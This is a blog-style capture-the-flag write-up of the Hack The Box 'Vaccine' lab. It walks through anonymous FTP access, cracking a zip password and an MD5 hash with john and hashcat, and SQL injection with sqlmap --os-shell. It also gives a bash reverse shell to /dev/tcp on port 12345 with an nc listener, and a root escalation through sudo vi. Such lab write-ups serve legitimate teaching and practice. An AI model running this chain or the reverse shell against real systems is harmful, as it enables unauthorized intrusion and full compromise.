Vaccine - HTB


4 min read

Pub. on 2022-06-10
  1. nmap scan
Starting Nmap 7.92 ( ) at 2022-06-09 23:39 UTC Nmap scan report for Host is up (0.87s latency). Not shown: 997 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 | ftp-syst: | STAT: | FTP server status: | Connected to ::ffff: | Logged in as ftpuser | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 2 | vsFTPd 3.0.3 - secure, fast, stable |_End of status | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-rwxr-xr-x 1 0 0 2533 Apr 13 2021 22/tcp open ssh OpenSSH 8.0p1 Ubuntu 6ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 c0:ee:58:07:75:34:b0:0b:91:65:b2:59:56:95:27:a4 (RSA) | 256 ac:6e:81:18:89:22:d7:a7:41:7d:81:4f:1b:b8:b2:51 (ECDSA) |_ 256 42:5b:c3:21:df:ef:a2:0b:c9:5e:03:42:1d:69:d0:28 (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set |_http-title: MegaCorp Login Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at . Nmap done: 1 IP address (1 host up) scanned in 112.70 seconds
  1. Looking at the nmap script, anonymous login via ftp is possible and a file can be obtained

  2. After getting it, attempting to unzip requested a password. Using john, a password has can be obtained

zip2john > hash.txt
  1. After obtaining the hash.txt file, use john to crack the password
john hash.txt # output => 741852963
  1. The password (741852963, obtainable by running john --show hash.txt) is then used to extract the zip archive
  1. Running cat on index.php reveals an md5 hash of the admin's password. A quick google search for 'reverse md5 hash' brings up tools to do that, and the password is found to be 'qwerty789'. An alternative method is to use hashcat in the format below:
echo "<HASH>" > hash hashcat -a 0 -m 0 hash /usr/share/seclist/rockyou.txt
  1. Then login to the portal, and a dashboard is presented. Now, it has a search component, that seems to update the table and a url shows a param being passed. So, its possible to test for sql injection, and instead of doing it manually, sqlmap is a great tool

  2. Running sqlmap -h shows some very helpful commands and ways to use the tool. In this case, we provide the url and cookie, for which the latter provides authentication

sqlmap -u 'http://{IP}/dashboard.php?search=any' --cookie="PHPSESSID={ID}"
  1. The output from sqlmap shows the GET param 'search' is vulnerable. The command is run once more this time with the extra flag --os-shell to enable command injection

  2. A shell is gotten, however not a pleasant one. A way to get a better one is to run

bash -c "bash -i >& /dev/tcp/{IP}/12345 0>&1"

and then start a nc listener on port 12345. After getting a connection, we can make the shell better and more stable:

python3 -c 'import pty; pty.spawn("/bin/bash")' ^Z # ctrl + z stty raw -echo;fg # PRESS ENTER TWICE export TERM=xterm
  1. Enumerating around reveals the postgres password under /var/www/html. This password can be used to login via ssh as postgres.

  2. Once in, a great step to take first would be to run 'sudo -l' so as to list the user's privileges. We have the permission to run /bin/vi on pg_hba.conf file as sudo. By looking up on GTFOBins, one can see ways of abusing privileges, and this is what worked and produced a root shell. (After accessing vim, press escape and run commands using the syntax :! - where :!/bin/sh presents us with a prompt as root)

sudo -l # <-- SNIP --> # User postgres may run the following commands on vaccine: # (ALL) /bin/vi /etc/postgresql/11/main/pg_hba.conf # <-- SNIP --> sudo vi /etc/postgresql/11/main/pg_hba.conf whoami # root
** THE END **